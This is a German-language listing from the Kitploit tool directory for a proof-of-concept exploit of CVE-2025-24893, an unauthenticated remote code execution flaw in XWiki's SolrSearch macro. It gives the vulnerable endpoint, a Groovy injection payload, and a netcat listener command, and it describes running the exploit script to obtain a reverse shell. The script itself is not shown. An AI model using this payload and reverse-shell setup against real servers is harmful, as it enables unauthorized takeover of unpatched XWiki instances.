Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC — CVE-2025-24893 ist eine kritische, nicht authentifizierte Remote-Code-Ausführungs-Schwachstelle in XWiki (Versionen < 15.10.11, 16.4.1, 16.5.0RC1), die durch unsachgemäße Handhabung von Groovy-Ausdrücken im SolrSearch-Makro verursacht wird. | Kitploit
Tools/GitHubGitHub/dollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubdollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc

CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC

CVE-2025-24893 ist eine kritische, nicht authentifizierte Remote-Code-Ausführungs-Schwachstelle in XWiki (Versionen < 15.10.11, 16.4.1, 16.5.0RC1), die durch unsachgemäße Handhabung von Groovy-Ausdrücken im SolrSearch-Makro verursacht wird.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
171vor 1 JahrNoch nicht geprüft

CVE-2025-24893 - XWiki Unauthentifizierter RCE-Exploit PoC

⚠️ Unauthentifizierte Remotecodeausführung in XWiki
🛠️ PoC-Implementierung von @dollarboysushil

💡 Übersicht

CVE-2025-24893 ist eine kritische RCE-Sicherheitslücke in XWiki, verursacht durch unsichere Behandlung von Groovy-Ausdrücken im SolrSearch-Makro. Ein Angreifer kann über eine manipulierte GET-Anfrage Groovy-Code einschleusen, was zu Remotecodeausführung führt (keine Authentifizierung erforderlich).

  • Schweregrad: Kritisch (CVSS 9.8)
  • Betroffen: Versionen < 15.10.11, 16.4.1, 16.5.0RC1

🛠 Technische Analyse

Die Sicherheitslücke befindet sich im SolrSearch-Makro (Main.SolrSearch) von XWiki, das die Sucheingabe mittels unsicherer Groovy-Auswertung verarbeitet. Das Makro bereinigt die benutzereingegebenen Daten nicht ausreichend, was beliebige Codeausführung ermöglicht.

🔥 Gefährdeter Endpunkt

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

Ein Angreifer kann Groovy-Code in den text-Parameter injizieren, der serverseitig aufgrund unsachgemäßer Eingabeüberprüfung im Makrosystem ausgewertet wird.

💥 Beispiel-Payload

root@kitploit:~
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

Dies führt zu einer unauthentifizierten Remotecodeausführung (RCE) auf angreifbaren XWiki-Instanzen.

🔬 Proof-of-Concept (PoC)-Demonstration

🧪 Zielumgebung

Das angreifbare Ziel ist eine XWiki-Instanz, die Version 15.10.8 ausführt und von CVE-2025-24893 betroffen ist.

Vulnerable XWiki Interface


📡 Vorbereiten des Listeners

Starten Sie einen Netcat-Listener auf dem Angreiferrechner, um die Reverse-Shell-Verbindung zu erfassen:

root@kitploit:~
nc -lvnp 1337

Netcat Listener Active on Port 1337


🚀 Ausführen des Exploits

Führen Sie das Exploit-Skript CVE-2025-24893-dbs.py aus, um den Groovy-basierten RCE-Payload an den angreifbaren XWiki-Endpunkt zu übermitteln.

Running Exploit Script


💻 Erfolgreicher Remote-Shell-Zugriff

Nach erfolgreicher Ausführung verbindet sich die Reverse-Shell mit dem Listener und gewährt dem Angreifer Remote-Zugriff auf den Server.

Reverse Shell Acquired


📚 Referenzen

  • OffSec-Blog: CVE-2025-24893 XWiki Groovy RCE
  • NVD-Eintrag: CVE-2025-24893
Tool herunterladen